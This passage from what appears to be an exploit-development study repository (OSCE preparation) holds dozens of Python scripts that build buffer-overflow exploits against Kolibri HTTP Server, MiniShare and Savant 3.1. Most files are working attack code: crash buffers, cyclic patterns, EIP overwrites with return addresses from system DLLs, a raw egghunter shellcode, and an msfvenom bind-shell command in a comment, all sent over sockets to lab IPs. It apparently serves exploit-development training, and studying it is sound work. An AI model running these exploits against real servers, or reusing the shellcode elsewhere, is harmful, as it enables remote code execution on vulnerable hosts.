socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_stage2_eip_cyclic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 8 | "\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 9 | 10 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "xEB\xC4" 11 | Stage2 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 12 | 13 | buffer = ( 14 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 15 | "Host: 172.16.73.129:8080\r\n" 16 | "User-Agent: " + Stage2 + "\r\n" 17 | "Keep-Alive: 115\r\n" 18 | "Connection: keep-alive\r\n\r\n") 19 | 20 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | expl.connect(("172.16.73.129", 8080)) 22 | expl.send(buffer) 23 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a's 16 | Stage1 = "A"*600 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 172.16.73.129:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("172.16.73.129", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_EIP_Push_ESP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application and put the push ESP (0x77c35459) into stage1 and then b's after 16 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*2 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 172.16.73.129:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("172.16.73.129", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_add_hunter_and_jmp_back_60.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #use mona -> !mona egg -t b33f -> "b33fb33f" 16 | hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 17 | "\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 18 | 19 | #EIP: 0x77c35459 push esp # ret | msvcrt.dll 20 | #ESP: jump back 60 bytes "\xeb\xc4" 21 | #use egghunter "b33fb33f" 22 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 23 | 24 | buffer = ( 25 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 26 | "Host: 172.16.73.129:8080\r\n" 27 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 28 | "Keep-Alive: 115\r\n" 29 | "Connection: keep-alive\r\n\r\n") 30 | 31 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | expl.connect(("172.16.73.129", 8080)) 33 | expl.send(buffer) 34 | expl.close() 35 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_cyclic_pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a cyclic pattern 16 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 172.16.73.129:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("172.16.73.129", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_cyclic_pattern_confirm_bs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with the "B"s in EIP 16 | Stage1 = "A"*515 + "B"*4 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 172.16.73.129:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("172.16.73.129", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a's 16 | Stage1 = "A"*600 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_eip_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a cyclic pattern 16 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_eip_crash_b's.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application and EIP with B's 16 | Stage1 = "A"*515 + "B"*4 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_jmp_back_60.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #jmp esp added from 0x77c35459 from msvcrt.dll 16 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "xEB\xC4" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #jmp esp added from 0x77c35459 from msvcrt.dll 16 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*4 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a's 16 | Stage1 = "A"*600 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_eip_crash_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application and EIP with B's 16 | Stage1 = "A"*515 + "B"*4 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_hunter_plus_stage2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #Egghunter 16 | #Size 32-bytes 17 | #use mona -> !mona egg -t w00t -> "w00tw00t" 18 | hunter = ( 19 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 20 | "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 21 | 22 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=192.168.37.131 LPORT=4444 -e x86/alpha_mixed -f c 23 | 24 | #0x7c9d30d7 jmp esp from shell32.dll? 25 | Stage1 = "A"*478 + hunter + "A"*5 + "\xd7\x30\x9d\x7c" + "\xEB\xC4" 26 | #hunter + shellcode 27 | Stage2 = "w00tw00t" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 28 | 29 | buffer = ( 30 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 31 | "Host: 192.168.37.131:8080\r\n" 32 | "User-Agent: " + Stage2 + "\r\n" 33 | "Keep-Alive: 115\r\n" 34 | "Connection: keep-alive\r\n\r\n") 35 | 36 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | expl.connect(("192.168.37.131", 8080)) 38 | expl.send(buffer) 39 | 40 | launchsploit = """ 41 | #----------------------------------------------# 42 | Kolibri Exploit Launched 43 | #----------------------------------------------# 44 | """ 45 | 46 | print launchsploit 47 | 48 | expl.close() 49 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_jmp_back_60.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #0x7c9d30d7 jmp esp from shell32.dll? 16 | Stage1 = "A"*515 + "\xd7\x30\x9d\x7c" + "B"*4 + "\xEB\xC4" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #jmp esp added from 0x77c35459 from msvcrt.dll 16 | #Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*4 17 | #0x7c9d30d7 jmp esp from shell32.dll? 18 | Stage1 = "A"*515 + "\xd7\x30\x9d\x7c" + "B"*4 19 | 20 | buffer = ( 21 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 22 | "Host: 192.168.37.131:8080\r\n" 23 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 24 | "Keep-Alive: 115\r\n" 25 | "Connection: keep-alive\r\n\r\n") 26 | 27 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | expl.connect(("192.168.37.131", 8080)) 29 | expl.send(buffer) 30 | expl.close() 31 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a cyclic pattern 16 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/minishare-15575/bs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | nops = "A" * 386 + "B" * 4 + "C" * 30 4 | buff = nops 5 | 6 | #[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode] 7 | 8 | f = open("users.txt",'w') 9 | f.write(buff) 10 | f.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/minishare-15575/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | nops = "A" * 500 4 | 5 | buff = nops 6 | 7 | #[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode] 8 | 9 | f = open("users.txt",'w') 10 | f.write(buff) 11 | f.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/minishare-15575/users.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Egg Hunter BoF/minishare-15575/users.txt -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_carr_rocx.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | buffer2 = "R0cX" + "R0cX" + "\x41" * 992 8 | 9 | badbuffer = "\xcc" 10 | badbuffer += "\x41" * (254 - len(badbuffer)) 11 | badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN 12 | httpmethod = "\xb0\x03\x04\x01\x7B\x15" # MOV AL, 3; ADD AL, 1; JPO 15 13 | 14 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 15 | 16 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | connect=sock.connect((target_address,target_port)) 18 | sock.send(sendbuf) 19 | sock.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_a.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "\x41" * 258 8 | httpmethod = "GET" 9 | 10 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 11 | 12 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect=sock.connect((target_address,target_port)) 14 | sock.send(sendbuf) 15 | sock.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x42"*4 9 | httpmethod = "GET" 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_b_00.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x42"*3 9 | httpmethod = "GET" 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter 